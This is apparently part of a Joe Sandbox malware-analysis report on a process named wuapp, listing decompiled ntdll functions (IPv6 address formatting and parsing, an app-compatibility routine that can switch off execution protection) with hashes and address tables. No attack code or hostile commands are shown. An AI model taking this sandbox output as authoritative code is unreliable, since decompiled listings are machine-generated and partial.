                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 402402107-258546922
                                                          • Opcode ID: 929f4d33884f1269310e6b8266e6aa8f933779e2d49437744814c70e88a5eccd
                                                          • Instruction ID: 78c96abd71a814f8ebc4dfb36425bdd3f79c507f0bc2d3898e0cd305fc2334f3
                                                          • Opcode Fuzzy Hash: 929f4d33884f1269310e6b8266e6aa8f933779e2d49437744814c70e88a5eccd
                                                          • Instruction Fuzzy Hash: 6DF109B6D0020AEFDF11EF98CD809EEBBB9FF18300F54446AE505A7211E7369A45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01FA13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E01FA13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01F97707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1f62926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01F97707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1f69cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01F97707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01F97707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01F97707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01F97707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                          0x01fa13d5
                                                          0x01fa13d9
                                                          0x01fa13dc
                                                          0x01fa13de
                                                          0x01fa13e1
                                                          0x01fa13e8
                                                          0x01fa13ee
                                                          0x01fce8fd
                                                          0x00000000
                                                          0x01fce921
                                                          0x01fce921
                                                          0x01fce928
                                                          0x01fce982
                                                          0x01fce98a
                                                          0x00000000
                                                          0x01fce99a
                                                          0x01fce99e
                                                          0x01fce9a3
                                                          0x01fce9a8
                                                          0x01fce9b9
                                                          0x01fce978
                                                          0x00000000
                                                          0x01fce978
                                                          0x01fce98a
                                                          0x01fce92a
                                                          0x01fce931
                                                          0x01fce944
                                                          0x01fce944
                                                          0x01fce950
                                                          0x01fce954
                                                          0x01fce959
                                                          0x01fce95e
                                                          0x01fce963
                                                          0x01fce970
                                                          0x00000000
                                                          0x01fce975
                                                          0x01fce93b
                                                          0x01fce980
                                                          0x00000000
                                                          0x01fce980
                                                          0x01fce942
                                                          0x01fce94b
                                                          0x00000000
                                                          0x01fce94b
                                                          0x00000000
                                                          0x01fce942
                                                          0x01fa13f4
                                                          0x01fa13f4
                                                          0x01fa13f9
                                                          0x01fa13fc
                                                          0x01fa13ff
                                                          0x01fa1406
                                                          0x01fce9cc
                                                          0x01fce9d2
                                                          0x01fce9d2
                                                          0x01fce9cc
                                                          0x01fa140c
                                                          0x01fa1411
                                                          0x01fa1431
                                                          0x01fa143a
                                                          0x01fa143c
                                                          0x01fa143f
                                                          0x01fa143f
                                                          0x01fa1442
                                                          0x01fa1447
                                                          0x01fa14a8
                                                          0x01fa14ac
                                                          0x01fce9e2
                                                          0x01fce9e7
                                                          0x01fce9ec
                                                          0x01fcea05
                                                          0x01fcea05
                                                          0x00000000
                                                          0x01fa1449
                                                          0x00000000
                                                          0x01fa1449
                                                          0x01fa144c
                                                          0x01fa1459
                                                          0x01fa1462
                                                          0x01fa1469
                                                          0x01fa146a
                                                          0x01fa1470
                                                          0x01fa1473
                                                          0x01fa1476
                                                          0x01fa1476
                                                          0x01fa1490
                                                          0x01fa1495
                                                          0x01fa138e
                                                          0x01fa1390
                                                          0x01fa1397
                                                          0x01fa1398
                                                          0x01fa1399
                                                          0x01fa13a1
                                                          0x01fa13a4
                                                          0x01fa13a4
                                                          0x01fa1498
                                                          0x01fa149c
                                                          0x01fa149f
                                                          0x01fa14a2
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa14a4
                                                          0x00000000
                                                          0x01fa14a4
                                                          0x01fa1413
                                                          0x01fa1415
                                                          0x01fa1416
                                                          0x01fa1419
                                                          0x01fa141c
                                                          0x01fa1422
                                                          0x01fa13b7
                                                          0x01fa13bc
                                                          0x01fa13bf
                                                          0x01fa13bf
                                                          0x01fa13c2
                                                          0x01fa1424
                                                          0x01fa1424
                                                          0x01fa1424
                                                          0x01fa1427
                                                          0x01fa142b
                                                          0x01fa142c
                                                          0x01fa142c
                                                          0x01fa142c
                                                          0x00000000
                                                          0x01fa141c
                                                          0x01fa1411

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                          • API String ID: 48624451-2108815105
                                                          • Opcode ID: ea268374a3e9c8727c0a6655d7fc3b0a48c0bbacc6cc2e9520b752e40bbd6f9b
                                                          • Instruction ID: 562db831319bcd39237175ce6291b0a2ebc42fd8cda9fec631ca5741cfd188c7
                                                          • Opcode Fuzzy Hash: ea268374a3e9c8727c0a6655d7fc3b0a48c0bbacc6cc2e9520b752e40bbd6f9b
                                                          • Instruction Fuzzy Hash: 676153B1D08756EADF34DF5DC8808BEBBB9EF95300B84C12DE9D647641D23AA640CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F97EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E01F97EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2042088; // 0x768eee31
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01F97F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01FB3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01F6DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2044218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01FB3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01F70D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01FB3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01F78375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01FB3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01FDE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01FB3F92();
					_t38 = 1;
					L2:
					return E01F6E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                          0x01f97f08
                                                          0x01f97f0f
                                                          0x01f97f12
                                                          0x01f97f1b
                                                          0x01f97f31
                                                          0x01fb3ead
                                                          0x01fb3eb4
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb3eba
                                                          0x01fb3ecd
                                                          0x01fb3ed2
                                                          0x01fb3ee1
                                                          0x01fb3ee7
                                                          0x01fb3eec
                                                          0x01fb3f12
                                                          0x01fb3f18
                                                          0x01fb3f1a
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb3f20
                                                          0x01fb3f26
                                                          0x01fb3f28
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb3f2e
                                                          0x01fb3f30
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb3f3a
                                                          0x01fb3f3b
                                                          0x01fb3f53
                                                          0x01fb3f64
                                                          0x01fb3f69
                                                          0x01fb3f6c
                                                          0x01fb3f6d
                                                          0x01fb3f6f
                                                          0x01fbe304
                                                          0x01fbe30f
                                                          0x01fbe315
                                                          0x01fbe31e
                                                          0x01fbe321
                                                          0x01fbe327
                                                          0x01fbe329
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fbe32f
                                                          0x01fbe32f
                                                          0x01fbe337
                                                          0x01fbe33a
                                                          0x01fbe33b
                                                          0x01fbe33d
                                                          0x01fbe33f
                                                          0x01fbe341
                                                          0x01fbe341
                                                          0x01fbe34e
                                                          0x01fbe353
                                                          0x01fbe358
                                                          0x01fbe35d
                                                          0x01fbe35f
                                                          0x00000000
                                                          0x00000000
                                                          0x01fbe365
                                                          0x01fbe365
                                                          0x01fbe368
                                                          0x01fbe36e
                                                          0x00000000
                                                          0x00000000
                                                          0x01fbe374
                                                          0x01fbe32f
                                                          0x01fb3f75
                                                          0x01fb3f7a
                                                          0x01fb3f7c
                                                          0x01fb3f7e
                                                          0x01fb3f86
                                                          0x01f97f39
                                                          0x01f97f47
                                                          0x01f97f47
                                                          0x01f97f37
                                                          0x01f97f37
                                                          0x00000000

                                                          APIs
                                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01FB3F12
                                                          Strings
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01FBE2FB
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01FB3F4A
                                                          • ExecuteOptions, xrefs: 01FB3F04
                                                          • Execute=1, xrefs: 01FB3F5E
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01FB3EC4
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01FB3F75
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01FBE345
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: BaseDataModuleQuery
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 3901378454-484625025
                                                          • Opcode ID: 7362aa1d43bf7448c2cf6f8f2427e98455587a5ab4c2a09168062b546d21cad7
                                                          • Instruction ID: 57368d5baf924fa0482890204e713f8135764158fa3f6f19a854d6b946f8d003
                                                          • Opcode Fuzzy Hash: 7362aa1d43bf7448c2cf6f8f2427e98455587a5ab4c2a09168062b546d21cad7
                                                          • Instruction Fuzzy Hash: A641DC71A8030DBAEF20EA95DCC5FDA73BCAF54704F0405A9A505F6081EB72DA468FA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01FA0B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E01FA0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01F78980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01F6DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01FA0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01FA0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01FA06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01FA06BA(_t135, _t178) == 0 || E01FA0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01FA0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01FA0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01FA06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01FA06BA(_t124, _t142) == 0 || E01FA0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                          0x01fa0b21
                                                          0x01fa0b24
                                                          0x01fa0b27
                                                          0x01fa0b2a
                                                          0x01fa0b2d
                                                          0x01fa0b30
                                                          0x01fa0b33
                                                          0x01fa0b36
                                                          0x01fa0b39
                                                          0x01fa0b3e
                                                          0x01fa0c65
                                                          0x01fa0c68
                                                          0x01fa0c6a
                                                          0x01fa0c6f
                                                          0x01fceb42
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceb48
                                                          0x01fceb48
                                                          0x01fa0c75
                                                          0x01fa0c7a
                                                          0x01fceb54
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceb5a
                                                          0x01fa0c80
                                                          0x01fa0c84
                                                          0x01fceb98
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceba6
                                                          0x01fa0cb8
                                                          0x01fa0cba
                                                          0x01fa0cd3
                                                          0x01fa0cda
                                                          0x01fa0ce4
                                                          0x01fa0ce9
                                                          0x00000000
                                                          0x01fa0cec
                                                          0x01fa0c8c
                                                          0x01fceb63
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceb70
                                                          0x01fceb75
                                                          0x01fceb7d
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceb8c
                                                          0x00000000
                                                          0x01fceb8c
                                                          0x01fa0c96
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0ca2
                                                          0x01fa0cac
                                                          0x01fa0cb4
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0b44
                                                          0x01fa0b47
                                                          0x01fa0b49
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0b4f
                                                          0x01fa0b50
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0b56
                                                          0x01fa0b62
                                                          0x01fa0b7c
                                                          0x01fa0bac
                                                          0x01fa0a0f
                                                          0x01fceaaa
                                                          0x00000000
                                                          0x01fceac4
                                                          0x01fceac4
                                                          0x01fa0bd0
                                                          0x01fa0bd0
                                                          0x01fa0bd4
                                                          0x01fa0bd9
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0bdb
                                                          0x01fa0be0
                                                          0x01fceb0e
                                                          0x01fa0a1a
                                                          0x00000000
                                                          0x01fa0a1a
                                                          0x01fceb1a
                                                          0x01fceb1f
                                                          0x01fceb27
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceb36
                                                          0x00000000
                                                          0x01fceb36
                                                          0x01fa0bea
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0bf6
                                                          0x01fa0c00
                                                          0x01fa0c03
                                                          0x01fa0c0b
                                                          0x00000000
                                                          0x01fa0c0b
                                                          0x01fceaaa
                                                          0x00000000
                                                          0x01fa0a15
                                                          0x01fa0bb6
                                                          0x00000000
                                                          0x01fa0bc6
                                                          0x01fa0bc6
                                                          0x01fa0bcb
                                                          0x01fa0c15
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0c1d
                                                          0x01fa0c20
                                                          0x01fa0c21
                                                          0x01fa0c24
                                                          0x01fa0c24
                                                          0x01fa0c26
                                                          0x00000000
                                                          0x01fa0c26
                                                          0x01fa0bcd
                                                          0x00000000
                                                          0x01fa0bcd
                                                          0x01fa0b89
                                                          0x01fa0b89
                                                          0x01fa0b90
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0b96
                                                          0x00000000
                                                          0x01fa0b96
                                                          0x01fa0a04
                                                          0x01fa0a04
                                                          0x01fa0b9a
                                                          0x01fa0b9a
                                                          0x01fa0b9b
                                                          0x01fa0b9f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0ba5
                                                          0x01fa0ac7
                                                          0x01fa0aca
                                                          0x01fceacf
                                                          0x00000000
                                                          0x01fceade
                                                          0x01fceade
                                                          0x01fceae3
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceaf3
                                                          0x01fceaf6
                                                          0x01fceaf7
                                                          0x01fceafe
                                                          0x01fceb01
                                                          0x00000000
                                                          0x01fceb01
                                                          0x01fceacf
                                                          0x01fa0ad0
                                                          0x01fa0ad4
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0ada
                                                          0x01fa0ae6
                                                          0x01fa0c34
                                                          0x00000000
                                                          0x01fa0c47
                                                          0x01fa0c49
                                                          0x01fa0c4a
                                                          0x01fa0c4e
                                                          0x01fa0c51
                                                          0x01fa0c54
                                                          0x01fa0c57
                                                          0x01fa0c5a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fa0c60
                                                          0x01fa0afb
                                                          0x01fa0afe
                                                          0x01fa0b02
                                                          0x01fa0b05
                                                          0x01fa0b08
                                                          0x00000000
                                                          0x01fa0b08
                                                          0x01fa0ae6
                                                          0x01fa0b44
                                                          0x01fa09f8
                                                          0x01fa09f8
                                                          0x01fa09f9
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceaa0
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID: .$:$:
                                                          • API String ID: 3965848254-2308638275
                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction ID: b659dbc28e6bd1dca249fec8a4b921084f6ac4e21f58826d9f1401d5c97f5b8b
                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                          • Instruction Fuzzy Hash: E0A1C0B1D0030AEFDF25CF68E9556BEBBB4AF05304F64846AF802A7241DF3A9641CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01FA0554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                          Download Yara Rule
